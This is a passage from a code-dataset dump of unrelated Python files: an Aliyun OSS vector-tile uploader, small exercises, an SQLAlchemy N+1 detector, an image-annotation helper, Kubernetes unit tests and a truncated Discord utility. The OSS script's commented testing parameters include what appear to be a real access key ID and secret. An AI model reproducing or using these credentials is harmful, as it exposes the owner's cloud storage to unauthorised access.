entry point into the script\ndef main(argv=None):\n # input new part vtpk name\n newPartVtpkPath = arcpy.GetParameterAsText(0)\n\n # input update service name\n serviceName = arcpy.GetParameterAsText(1)\n\n # input oss access key id\n access_key_id = arcpy.GetParameterAsText(2)\n\n # input oss key password\n access_key_secret = arcpy.GetParameterAsText(3)\n\n # input bucket name\n bucket_name = arcpy.GetParameterAsText(4)\n\n # input endpoint\n endpoint = arcpy.GetParameterAsText(5)\n\n # testing parameters\n # newPartVtpkPath = \"/Users/maklmac/Desktop/newPart.vtpk\"\n # serviceName = 'makltest'\n # access_key_id = 'LTAI95MbCPCvRXjZ'\n # access_key_secret = '1bZNmbZzT9v8sUUqXC65VlfNeQVcRn'\n # bucket_name = 'zhoun'\n # endpoint = 'http://oss-cn-shanghai.aliyuncs.com'\n\n execute(newPartVtpkPath, serviceName, access_key_id, access_key_secret, bucket_name, endpoint)\n\n# Change vtpk extension from .vtpk to .zip\ndef retype(newPartVtpkPath,newtype):\n try:\n filename = os.path.splitext(newPartVtpkPath)[0]; # file name\n filetype = os.path.splitext(newPartVtpkPath)[1]; # file type\n olddir = newPartVtpkPath\n newdir = filename + newtype\n os.rename(olddir, newdir)\n print(\"has changed:\" + newdir)\n\n return newdir\n except:\n arcpy.AddError(\"retype failed: please provide a validates path\")\n\n#uncompress the .zip file to folder\ndef unzip(newPartZipPath):\n try:\n file_zip = 
zipfile.ZipFile(newPartZipPath, 'r')\n for file in file_zip.namelist():\n # print \"unziping...\"\n extractFolder = os.path.splitext(newPartZipPath)[0]\n file_zip.extract(file, extractFolder)\n file_zip.close()\n os.remove(newPartZipPath)\n print(\"unzip succeed!\")\n return extractFolder\n except:\n arcpy.AddError(\"unzip failed, please provde a validates path\")\n return False\n\ndef zip_and_retype(newPartZipPath):\n try:\n prelen = len(newPartZipPath)\n # print(prelen)\n print(\"zip root folder: \" + newPartZipPath)\n\n zipDir = newPartZipPath + \".zip\"\n fp = zipfile.ZipFile(zipDir, mode='w')\n for parent, dirnames, filenames in os.walk(newPartZipPath):\n for filename in filenames:\n pathfile = os.path.join(parent, filename)\n arcname = pathfile[prelen:].strip(os.path.sep)\n fp.write(pathfile, arcname, compress_type=zipfile.ZIP_STORED)\n fp.close()\n print(\"zipDir:\" + zipDir)\n retype(zipDir,\".vtpk\")\n return True\n except:\n arcpy.AddError(\"path or folderName not exit.\")\n\ndef delete_zip_folder(newPartZipPath):\n shutil.rmtree(newPartZipPath)\n\n# return the unzip local tile path include LODs\ndef get_local_tile_path(newPartVtpkPath):\n newPartZipPath = retype(newPartVtpkPath,\".zip\")\n extractFolder = unzip(newPartZipPath)\n # for mac path\n # tilePath = extractFolder + '/p12/tile'\n\n # for windows path\n tilePath = os.path.join(extractFolder, 'p12\\\\tile')\n print(\"local new part tile path:\", tilePath)\n return tilePath\n\n# connect OSS by access_key_id, access_key_secrest, bucket_name, endpoint\ndef connect_OSS(access_key_id,access_key_secret,bucket_name,endpoint):\n # verify parameters\n for param in (access_key_id, access_key_secret, bucket_name, endpoint):\n assert '<' not in param, '请设置参数:' + param\n\n # create Bucket object\n bucket = oss2.Bucket(oss2.Auth(access_key_id, access_key_secret), endpoint, bucket_name)\n\n print(\"connect succeed: \" + bucket_name)\n\n return bucket\n\n# upload bundles from local bundle files to OSS cache directories\ndef oss_upload_bundles(bucket,filepath,bucket_path):\n file_list = os.listdir(filepath)\n for Level in file_list:\n lodPath = os.path.join(filepath,Level)\n bundles = os.listdir(lodPath)\n bucket_lod_path = os.path.join(bucket_path,Level)\n for bundle in bundles:\n local_bundle_path = os.path.join(lodPath,bundle)\n bucket_bundle_path = os.path.join(bucket_lod_path,bundle)\n result = bucket.put_object_from_file(bucket_bundle_path, local_bundle_path)\n print(local_bundle_path)\n print (bucket_bundle_path)\n print(result)\n return True\n\n# execute method for OSS\ndef upload_bundle_In_OSS(filePath, bucketPath,access_key_id, access_key_secret, bucket_name,endpoint):\n\n bucket = connect_OSS(access_key_id, access_key_secret, bucket_name, endpoint)\n result = oss_upload_bundles(bucket, filePath, bucketPath)\n return result\n\n# get bucket cache path for specific service name\ndef get_bucket_path(serviceName):\n bucket_path= 'agssitecache/VectorCache/Hosted/' + serviceName + '/VectorTileServer/tile'\n return bucket_path\n\n\ndef execute(newPartVtpkPath, serviceName, access_key_id, access_key_secret, bucket_name,endpoint):\n\n try:\n #get local vector tile cache path\n filepath = get_local_tile_path(newPartVtpkPath)\n\n #get oss bucket path\n bucket_path = get_bucket_path(serviceName)\n\n #upload local vector tile cache to oss bucket store\n result = upload_bundle_In_OSS(filepath,bucket_path,access_key_id, access_key_secret, bucket_name,endpoint)\n\n if result:\n #zip newPathVTPKPath\n zip_and_retype(newPartVtpkPath)\n #delect zip 
folder\n delete_zip_folder(newPartVtpkPath)\n except:\n arcpy.AddError(\"execute failed!\")\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv[1:]))\n\n\n\n","sub_path":"python/updateVectorTileforOSS.py","file_name":"updateVectorTileforOSS.py","file_ext":"py","file_size_in_byte":5836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"578960016","text":"# Print the element at row n, column k of Yang Hui's (Pascal's) triangle\ndef yanghui(Row, Column):\n if Column == 1 or Row == Column:\n return 1\n else:\n return yanghui(Row - 1, Column - 1) + yanghui(Row - 1, Column) \n\nRow = input(\"Row of the element in Yang Hui's triangle: \")\nColumn = input(\"Column of the element in Yang Hui's triangle: \")\nif int(Column) > int(Row):\n print(\"ERROR: no element exists at this position in Yang Hui's triangle\")\nelse:\n print(yanghui(int(Row),int(Column)))\n\n","sub_path":"python基础/yanghui.py","file_name":"yanghui.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"439786183","text":"\n# coding: utf-8\n\n# In[8]:\n\nfrom databaker.framework import *\n\n\n# In[9]:\n\ntabs = loadxlstabs('beatlebattle.xlsx')\n\n\n# In[10]:\n\n\nconversionsegments = []\n\n# only 1 but conventions n all\nfor tab in tabs:\n \n obs = tab.excel_ref('B4').expand(DOWN).expand(RIGHT)\n \n beatlenames = tab.excel_ref('B3').expand(RIGHT)\n \n dimensions = [\n HDim(beatlenames, 'Name', DIRECTLY, ABOVE),\n ]\n \n conversionsegment = ConversionSegment(tab, dimensions, obs)\n conversionsegments.append(conversionsegment)\n \n \n\n\n# In[11]:\n\n\n# proceed to output\noutputfile = 'trial_beatlesoutput.csv'\nwritetechnicalCSV(outputfile, conversionsegments)\n\n","sub_path":"playing.py","file_name":"playing.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"472038090","text":"import pathlib\nimport json\nimport tqdm\nimport sys\n\n\nif __name__ == '__main__':\n from spacy.lang.en import English\n model = English()\n model.add_pipe(model.create_pipe('sentencizer'))\n\n wakati_fpath = 'data/enwiki-20181001-pages-articles.txt'\n wikiextractor_dir = pathlib.Path('data/enwiki')\n\n wakati_file = open(wakati_fpath, 'w')\n json_fpath_list = list(wikiextractor_dir.glob('*/wiki_*'))\n for json_fpath in tqdm.tqdm(json_fpath_list):\n for json_str in open(json_fpath):\n\n try:\n json_object = json.loads(json_str)\n document = json_object['text']\n document = document.replace('\\n', '')\n document = document.replace('\\r', '')\n\n document = model(document)\n for sentence in document.sents:\n try:\n print(' '.join(w.text for w in sentence),\n file=wakati_file)\n\n except Exception as e2:\n print(e2, file=sys.stderr)\n\n except Exception as e:\n print(e, file=sys.stderr)\n\n wakati_file.close()\n","sub_path":"tool/vector/vector/fetch_enwikipedia.py","file_name":"fetch_enwikipedia.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610456362","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport itertools\n\nfrom sqlalchemy.orm import query\nfrom sqlalchemy.orm import attributes\nfrom sqlalchemy.orm import strategies\n\nfrom nplusone.core import signals\n\n\ndef to_key(instance):\n model = type(instance)\n columns = model.__table__.primary_key.columns\n return ':'.join(\n [model.__name__] +\n [format(getattr(instance, column.key)) for column in columns]\n )\n\n
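\n# Added note (illustrative, not from the original module): for a mapped class\n# User whose primary-key column id holds 42, to_key(user) returns 'User:42',\n# the model name joined with each primary-key value.\n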
\ndef parse_load(args, kwargs, context, ret):\n return [\n to_key(row) for row in ret\n if hasattr(row, '__table__')\n ]\n\n\ndef parse_lazy_load(args, kwargs, context):\n loader, state, _ = args\n return loader.parent.class_, to_key(state.object), loader.parent_property.key\n\n\ndef parse_eager_load(args, kwargs, context):\n loader = args[0]\n return loader.parent.class_, loader.key\n\n\ndef parse_attribute_get(args, kwargs, context):\n attr = args[0]\n return attr.class_, attr.key\n\n\nstrategies.LazyLoader._load_for_state = signals.signalify(\n signals.lazy_load,\n strategies.LazyLoader._load_for_state,\n parser=parse_lazy_load,\n)\n\n\nstrategies.JoinedLoader._create_eager_join = signals.signalify(\n signals.eager_load,\n strategies.JoinedLoader._create_eager_join,\n parser=parse_eager_load,\n)\n\n\nstrategies.SubqueryLoader._apply_joins = signals.signalify(\n signals.eager_load,\n strategies.SubqueryLoader._apply_joins,\n parser=parse_eager_load,\n)\n\n\nattributes.InstrumentedAttribute.__get__ = signals.signalify(\n signals.touch,\n attributes.InstrumentedAttribute.__get__,\n parser=parse_attribute_get,\n)\n\n\ndef is_single(offset, limit):\n return limit is not None and limit - (offset or 0) == 1\n\n\noriginal_query_iter = query.Query.__iter__\ndef query_iter(self):\n ret, clone = itertools.tee(original_query_iter(self))\n if not is_single(self._offset, self._limit):\n signals.load.send(\n signals.get_worker(),\n args=(self, ),\n ret=list(clone),\n parser=parse_load,\n )\n return ret\nquery.Query.__iter__ = query_iter\n","sub_path":"nplusone/ext/sqlalchemy.py","file_name":"sqlalchemy.py","file_ext":"py","file_size_in_byte":2082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"22666677","text":"# Task 1:\r\n# Given a list of fruits,\r\n# write a program that prints the fruits as a numbered list,\r\n# right-aligned.\r\n\r\n# Example:\r\n# Given: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\r\n# Output:\r\n# 1. яблоко\r\n# 2. банан\r\n# 3. киви\r\n# 4. арбуз\r\n\r\n# Hint: use the .format() method\r\n\r\n
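# Added note (not in the original): '{:>6}' right-aligns its argument in a field\r\n# six characters wide, e.g. '{}: {:>6}'.format(1, 'lime') == '1:   lime'.\r\n\r\n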
fruits = ['дыня', 'груша', 'апельсин', 'лайм', 'ананас', 'киви']\r\nn = 1\r\nfor i in fruits:\r\n print('{}: {:>6}'.format(n, i))\r\n n += 1\r\n\r\n# Result\r\n# 1: дыня\r\n# 2: груша\r\n# 3: апельсин\r\n# 4: лайм\r\n# 5: ананас\r\n# 6: киви\r\n\r\n\r\n# Task 2:\r\n# Given two arbitrary lists,\r\n# remove from the first list the elements that are present in the second list.\r\n\r\nlist1 = [1, 2, 11, 560, 72, 'lol', 'for', 8, True]\r\nlist2 = [88, False, '72', True, 11, 32, 960, 1024, 'for']\r\n\r\nprint('list1:', list1)\r\nprint('list2:', list2)\r\n# Removing items from a list while iterating over it skips elements, so build a new list instead.\r\nlist1 = [i1 for i1 in list1\r\n if not any(i1 == i2 and type(i1) == type(i2) for i2 in list2)]\r\nprint('Result:', list1)\r\n\r\n# Result\r\n# list1: [1, 2, 11, 560, 72, 'lol', 'for', 8, True]\r\n# list2: [88, False, '72', True, 11, 32, 960, 1024, 'for']\r\n# Result: [1, 2, 560, 72, 'lol', 8]\r\n\r\n\r\n# Task 3:\r\n# Given an arbitrary list of integers,\r\n# build a NEW list from the elements of the original under these rules:\r\n# if an element is divisible by two, divide it by 4; if not, multiply it by two.\r\n\r\nprint('20, 44, 13, 22, 265, 16, 8, 77, 80, 43')\r\na = [20, 44, 13, 22, 265, 16, 8, 77, 80, 43]\r\nb = []\r\nfor i in a:\r\n if i % 2:\r\n b.append(i * 2)\r\n else:\r\n b.append(i / 4)\r\nprint('a:', a)\r\nprint('b:', b)\r\n\r\n# Result\r\n# 20, 44, 13, 22, 265, 16, 8, 77, 80, 43\r\n# a: [20, 44, 13, 22, 265, 16, 8, 77, 80, 43]\r\n# b: [5.0, 11.0, 26, 5.5, 530, 4.0, 2.0, 154, 20.0, 86]","sub_path":"Easy_homework 3.py","file_name":"Easy_homework 3.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"288628539","text":"\"\"\"\nContains KulpsinAnnotations-class which hopefully makes interacting with my\nannotations easier.\n\n
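A minimal usage sketch (file names invented for illustration):\n\n    ann = KulpsinAnnotations(\"annotations.json\")\n    info = ann.load_image_data(\"photos/cat.jpg\")\n    ann.add_annotation(info[\"image_id\"], ((10, 10), (60, 80)), \"cat\")\n    ann.save_annotations()\n\n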
This is W.I.P. (work in progress) though, I advise not to use it just yet.\n\nCode: Python 3\n\"\"\"\n\nimport os\nimport json\nimport hashlib\nimport imghdr\nimport logging\nlogger = logging.getLogger(__file__)\n\nCONFIG = {\n 'min_box_side_length': 5,\n}\n\nclass KulpsinAnnotations:\n\n def __init__(self, save_path=None):\n \"\"\"\n save_path: default saving file name\"\"\"\n self._annotations = None\n self._annotation_json = save_path\n if save_path is not None:\n self.load_annotations()\n\n\n def load_annotations(self, annotation_json=None):\n \"\"\"\n Load annotations from disk at `annotation_json`.\n If `annotation_json` is None, use `save_path` given\n when object was initialized.\n \"\"\"\n if self._annotations is not None:\n raise RuntimeError(\"Annotations loaded already\")\n # Load existing annotations:\n if annotation_json is None:\n annotation_json = self._annotation_json\n if annotation_json is None:\n raise RuntimeError(\"Save path not defined.\")\n try:\n with open(annotation_json, \"r\") as json_file:\n self._annotations = json.load(json_file)\n except FileNotFoundError:\n logger.error(\"Annotation file not found: %s\"%annotation_json)\n self._annotations = {\"last_file_index\":0, \"images\": {}}\n\n\n def save_annotations(self, annotation_json=None, last_file_index=None, save_sets=False):\n \"\"\"Save annotations to disk at `annotation_json`.\n If `annotation_json` is None, use `save_path` given\n when object was initialized.\"\"\"\n if last_file_index is not None:\n self._annotations[\"last_file_index\"] = last_file_index\n if annotation_json is None:\n annotation_json = self._annotation_json\n if annotation_json is None:\n raise RuntimeError(\"Save path not defined.\")\n\n with open(annotation_json, 'w') as json_file:\n json.dump(self._annotations, json_file)\n if save_sets:\n test_path = os.path.join(os.path.dirname(self._annotation_json), \"test.txt\")\n trainval_path = os.path.join(os.path.dirname(self._annotation_json), \"trainval.txt\")\n logger.debug(\"Saving %s and %s\"%(test_path, trainval_path))\n with open(test_path, \"w\") as test_f, \\\n open(trainval_path, \"w\") as trainval_f:\n for image_id in self._annotations[\"images\"]:\n if self.get_image_path(image_id) is None:\n continue\n if \"image_set\" in self._annotations[\"images\"][image_id]:\n if self._annotations[\"images\"][image_id][\"image_set\"] == \"test\":\n test_f.write(image_id + \"\\n\")\n elif self._annotations[\"images\"][image_id][\"image_set\"] == \"trainval\":\n trainval_f.write(image_id + \"\\n\")\n\n def load_image_data(self, file_name=None, image_id=None):\n \"\"\"Loads existing annotations for the image.\n Adds it if it doesn't exist.\n image_id: if the id is known already, skip the hash calculation.\n Returns the image id and annotations.\n \"\"\"\n file_type = None\n if image_id is None:\n\n # First check that it's an image/photo\n file_type = imghdr.what(file_name)\n if file_type is None:\n return None\n\n # We use the hash as the image identifier so that duplicate images map to the same entry\n with open(file_name, 'rb') as f:\n image_id = hashlib.sha256(f.read()).hexdigest()\n logger.debug(\"Image sha256 hash: %s\" % image_id)\n else:\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n\n new_entry = False\n if file_name is not None:\n if image_id in self._annotations[\"images\"]:\n # Duplicate image paths are both saved (in case the other\n # is removed)\n if file_name not in 
self._annotations[\"images\"][image_id][\"file_paths\"]:\n self._annotations[\"images\"][image_id][\"file_paths\"].append(file_name)\n\n # Earlier version didn't have \"image_format\"-field:\n if \"image_format\" not in self._annotations[\"images\"][image_id]:\n if file_type is None:\n file_type = imghdr.what(file_name)\n assert file_type is not None, \"File type must not be None\"\n self._annotations[\"images\"][image_id][\"image_format\"] = file_type\n else:\n # Adding image data to database\n self._annotations[\"images\"][image_id] = {\n \"file_paths\": [file_name],\n \"bounding_boxes\": [],\n \"image_format\": file_type,\n }\n self.save_annotations(self._annotation_json + \".tmp\")\n new_entry = True\n return {\n \"image_id\": image_id,\n \"bounding_boxes\": self._annotations[\"images\"][image_id][\"bounding_boxes\"],\n \"new_entry\": new_entry,\n }\n\n def clear_removed_files(self):\n \"\"\"Checks \"File_paths\" and removes files that have been\n removed\"\"\"\n raise NotImplementedError\n\n def get_last_file_index(self):\n if \"last_file_index\" in self._annotations:\n return self._annotations[\"last_file_index\"]\n else:\n return 0\n\n def get_image_path(self, image_id):\n \"\"\"Getter for image path\"\"\"\n for p in self._annotations[\"images\"][image_id][\"file_paths\"]:\n if os.path.exists(p):\n return p\n\n def get_image_paths(self, image_id):\n return self._annotations[\"images\"][image_id][\"file_paths\"]\n\n def annotations(self):\n for ann in self._annotations[\"images\"]:\n yield ann\n\n def fix_and_remove_invalid_entries(self, image_id=None):\n \"\"\"Checks for:\n - Removed images\n - Negative coordinates\n - Too small bounding boxes\"\"\"\n from PIL import Image\n def fix_and_remove_single_entry(image_id, value):\n # Check for removed files:\n index = 0\n while index < len(value[\"file_paths\"]):\n p = value[\"file_paths\"][index]\n if not os.path.isfile(p):\n value[\"file_paths\"].pop(index)\n else:\n index += 1\n # TODO: Fix too large coordinates...\n first_file = self.get_image_path(image_id)\n size = None\n if first_file is not None:\n size = Image.open(self.get_image_path(image_id)).size\n\n # Check bounding boxes\n index = 0\n while index < len(value[\"bounding_boxes\"]):\n b = value[\"bounding_boxes\"][index]\n\n # TODO: Missing entity?\n #if \"entity\" not in b:\n # logger.info(\"Entity fixed...\")\n # value[\"bounding_boxes\"][index][\"entity\"] = \"person\"\n\n # Fix negative coordinates to 0\n if (b[\"pt1\"][0] < 0 or\n b[\"pt1\"][1] < 0 or\n b[\"pt2\"][0] < 0 or\n b[\"pt2\"][1] < 0):\n logger.info(\"Fixed negative coordinate (%s)!\"%str(b))\n value[\"bounding_boxes\"][index][\"pt1\"] = \\\n (max(b[\"pt1\"][0], 0), max(b[\"pt1\"][1], 0))\n value[\"bounding_boxes\"][index][\"pt2\"] = \\\n (max(b[\"pt2\"][0], 0), max(b[\"pt2\"][1], 0))\n\n # Fix too large coordinates to width-1 or height-1\n if size is not None and \\\n (b[\"pt1\"][0] >= size[0] or\n b[\"pt1\"][1] >= size[1] or\n b[\"pt2\"][0] >= size[0] or\n b[\"pt2\"][1] >= size[1]):\n logger.info(\"Fixed too large coordinate (%s)!\"%str(b))\n value[\"bounding_boxes\"][index][\"pt1\"] = \\\n (min(b[\"pt1\"][0], size[0]-1), min(b[\"pt1\"][1], size[1]-1))\n value[\"bounding_boxes\"][index][\"pt2\"] = \\\n (min(b[\"pt2\"][0], size[0]-1), min(b[\"pt2\"][1], size[1]-1))\n\n # Remove boxes too small\n if (b[\"pt2\"][0] - b[\"pt1\"][0] < CONFIG['min_box_side_length'] or\n b[\"pt2\"][1] - b[\"pt1\"][1] < CONFIG['min_box_side_length']):\n logger.info(\"Removed too small bounding box!\")\n 
value[\"bounding_boxes\"].pop(index)\n else:\n index += 1\n if image_id is None:\n for _image_id, value in self._annotations[\"images\"].items():\n fix_and_remove_single_entry(_image_id, value)\n\n else:\n fix_and_remove_single_entry(image_id, self._annotations[\"images\"][image_id])\n\n # Save temporary copy:\n self.save_annotations(self._annotation_json + \".tmp\")\n def remove_path(self, image_id, removable):\n \"\"\"Removes specified path from specific image and then saves annotations\n to drive\n \"\"\"\n self._annotations[\"images\"][image_id][\"file_paths\"].remove(removable)\n self.save_annotations()\n\n def add_annotation(self, image_id, points, entity):\n \"\"\"Adds annotation into image\n image_id: id from load_image_data()-method\n points: tuple format: ((x1, y1), (x2, y2))\n entity: string e.g. \"person\"\n \"\"\"\n assert type(points) is tuple, \"Use tuple for points\"\n assert len(points) == 2, \"There must be exactly 2 points\"\n assert type(points[0]) is tuple, \"Use tuple for point coordinates\"\n assert type(points[1]) is tuple, \"Use tuple for point coordinates\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n\n self._annotations[\"images\"][image_id][\"bounding_boxes\"].append({\n \"entity\": entity,\n \"pt1\": points[0],\n \"pt2\": points[1],\n })\n # Save temporary copy:\n self.save_annotations(self._annotation_json + \".tmp\")\n\n def select_bounding_box(self, image_id, point, index=0):\n \"\"\"Find annotation bounding box that is around the given `point`.\n index: with overlapping boxes, this allows to choose specific one\n returns coordinates as tuple format ((x1, y1), (x2, y2))\"\"\"\n\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n box_list = []\n for d in self._annotations[\"images\"][image_id][\"bounding_boxes\"]:\n if (d[\"pt1\"][0] <= point[0] <= d[\"pt2\"][0] and\n d[\"pt1\"][1] <= point[1] <= d[\"pt2\"][1]):\n box_list.append((d[\"pt1\"], d[\"pt2\"]))\n if len(box_list) == 0:\n return None\n return box_list[index % len(box_list)]\n\n\n def remove_annotation(self, image_id, points, entity=None):\n \"\"\"Remove specific bounding box from annotation list.\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n index = 0\n while index < len(self._annotations[\"images\"][image_id][\"bounding_boxes\"]):\n d = self._annotations[\"images\"][image_id][\"bounding_boxes\"][index]\n if (d[\"pt1\"] == points[0] and\n d[\"pt2\"] == points[1] and\n (entity is None or entity == d[\"entity\"])):\n removed = self._annotations[\"images\"][image_id][\"bounding_boxes\"].pop(index)\n logger.debug(\"Removed bounding box: ({}, {}), ({},{})\".format(\n removed[\"pt1\"][0], removed[\"pt1\"][1],\n removed[\"pt2\"][0], removed[\"pt2\"][1]))\n else:\n index += 1\n\n def set_trainval(self, image_id):\n \"\"\"Assign image to trainval-set\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n self._annotations[\"images\"][image_id][\"image_set\"] = \"trainval\"\n\n def set_test(self, image_id):\n \"\"\"Assign image to test-set\"\"\"\n assert image_id in self._annotations[\"images\"], \"Image_id not found\"\n self._annotations[\"images\"][image_id][\"image_set\"] = \"test\"\n\n\nif __name__ == \"__main__\":\n raise NotImplementedError\n","sub_path":"lib/datasets/kulpsin_annotation.py","file_name":"kulpsin_annotation.py","file_ext":"py","file_size_in_byte":12541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} 
+{"seq_id":"125510128","text":"\n\nclass vector:\n def __init__(self, vec): # specifying the vector class\n self .vec = vec\n\n def __str__(self): # printing the list in form of string\n str1 =\"\"\n index =0\n for i in self.vec:\n str1 += f\" {i}a{index} +\"\n index +=1\n return str1[:-1]\n\n def __len__(self):\n return len(self.vec)\n\nv1 = vector([1, 3]) \nv2 = vector([2, 6])\nprint(v1)\nprint(v1)\nprint(len(v1)) # print len of v1 vector\nprint(len(v2)) # print len of v2 vector\n\n","sub_path":"Chap11_inheritence/16_prac7.py","file_name":"16_prac7.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"522017708","text":"# Copyright 2015-2019 Yelp Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport mock\nimport pytest\n\nimport paasta_tools.instance.kubernetes as pik\nfrom paasta_tools import utils\n\n\ndef test_instance_types_integrity():\n for it in pik.INSTANCE_TYPES:\n assert it in utils.INSTANCE_TYPES\n for it in pik.INSTANCE_TYPES_WITH_SET_STATE:\n assert it in utils.INSTANCE_TYPES\n\n\ndef instance_status_kwargs():\n return dict(\n service=\"\",\n instance=\"\",\n instance_type=\"\",\n verbose=0,\n include_smartstack=False,\n settings=mock.Mock(),\n )\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_invalid_instance_type(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n with pytest.raises(RuntimeError) as excinfo:\n pik.instance_status(**kwargs)\n assert \"Unknown instance type\" in str(excinfo.value)\n assert len(mock_cr_status.mock_calls) == 0\n assert len(mock_kubernetes_status.mock_calls) == 0\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_kubernetes_only(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n kwargs.update(instance_type=\"kubernetes\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 0\n assert len(mock_kubernetes_status.mock_calls) == 1\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_cr_only(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n kwargs.update(instance_type=\"flink\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 1\n assert len(mock_kubernetes_status.mock_calls) == 0\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.cr_status\", autospec=True)\n@mock.patch(\"paasta_tools.instance.kubernetes.kubernetes_status\", autospec=True)\ndef test_instance_status_cr_and_kubernetes(mock_kubernetes_status, mock_cr_status):\n kwargs = instance_status_kwargs()\n 
kwargs.update(instance_type=\"cassandracluster\")\n pik.instance_status(**kwargs)\n assert len(mock_cr_status.mock_calls) == 1\n assert len(mock_kubernetes_status.mock_calls) == 1\n\n\n@mock.patch(\"paasta_tools.instance.kubernetes.job_status\", autospec=True)\n@mock.patch(\n \"paasta_tools.kubernetes_tools.replicasets_for_service_instance\", autospec=True\n)\n@mock.patch(\"paasta_tools.kubernetes_tools.pods_for_service_instance\", autospec=True)\n@mock.patch(\"paasta_tools.kubernetes_tools.get_kubernetes_app_by_name\", autospec=True)\n@mock.patch(\n \"paasta_tools.instance.kubernetes.LONG_RUNNING_INSTANCE_TYPE_HANDLERS\",\n autospec=True,\n)\ndef test_kubernetes_status(\n mock_LONG_RUNNING_INSTANCE_TYPE_HANDLERS,\n mock_get_kubernetes_app_by_name,\n mock_pods_for_service_instance,\n mock_replicasets_for_service_instance,\n mock_job_status,\n):\n mock_LONG_RUNNING_INSTANCE_TYPE_HANDLERS[\"flink\"] = mock.Mock()\n mock_pods_for_service_instance.return_value = []\n mock_replicasets_for_service_instance.return_value = []\n status = pik.kubernetes_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n include_smartstack=False,\n instance_type=\"flink\",\n settings=mock.Mock(),\n )\n assert \"app_count\" in status\n assert \"evicted_count\" in status\n assert \"bounce_method\" in status\n assert \"desired_state\" in status\n\n\ndef test_cr_status_bad_instance_type():\n with pytest.raises(RuntimeError) as excinfo:\n pik.cr_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n instance_type=\"marathon\",\n kube_client=mock.Mock(),\n )\n assert \"Unknown instance type\" in str(excinfo.value)\n\n\n@mock.patch(\"paasta_tools.kubernetes_tools.get_cr\", autospec=True)\ndef test_cr_status_happy_path(mock_get_cr):\n mock_status = mock.Mock()\n mock_metadata = mock.Mock()\n mock_return = dict(status=mock_status, metadata=mock_metadata)\n mock_get_cr.return_value = mock_return\n status = pik.cr_status(\n service=\"\",\n instance=\"\",\n verbose=0,\n instance_type=\"flink\",\n kube_client=mock.Mock(),\n )\n assert status == mock_return\n\n\ndef test_set_cr_desired_state_invalid_instance_type():\n with pytest.raises(RuntimeError) as excinfo:\n pik.set_cr_desired_state(\n kube_client=mock.Mock(),\n service=mock.Mock(),\n instance=mock.Mock(),\n instance_type=\"marathon\",\n desired_state=mock.Mock(),\n )\n assert \"Unknown instance type\" in str(excinfo.value)\n\n\n@mock.patch(\"paasta_tools.kubernetes_tools.set_cr_desired_state\", autospec=True)\ndef test_set_cr_desired_state_calls_k8s_tools(mock_set_cr_desired_state):\n pik.set_cr_desired_state(\n kube_client=mock.Mock(),\n service=mock.Mock(),\n instance=mock.Mock(),\n instance_type=\"flink\",\n desired_state=mock.Mock(),\n )\n assert len(mock_set_cr_desired_state.mock_calls) == 1\n\n\ndef test_can_set_state():\n for it in pik.INSTANCE_TYPES_WITH_SET_STATE:\n assert pik.can_set_state(it)\n\n assert not pik.can_set_state(\"marathon\")\n\n\ndef test_can_handle():\n for it in pik.INSTANCE_TYPES:\n assert pik.can_handle(it)\n\n assert not pik.can_handle(\"marathon\")\n","sub_path":"tests/instance/test_kubernetes.py","file_name":"test_kubernetes.py","file_ext":"py","file_size_in_byte":6082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"450171159","text":"''' Utility methods which don't belong elsewhere.\n'''\nimport logging\nimport sys\nimport traceback\n\ndef get_required_bot_permissions_value():\n ''' Get a permissions value as an integer that can be inserted in a Discord URL to\n invite a bot to a 
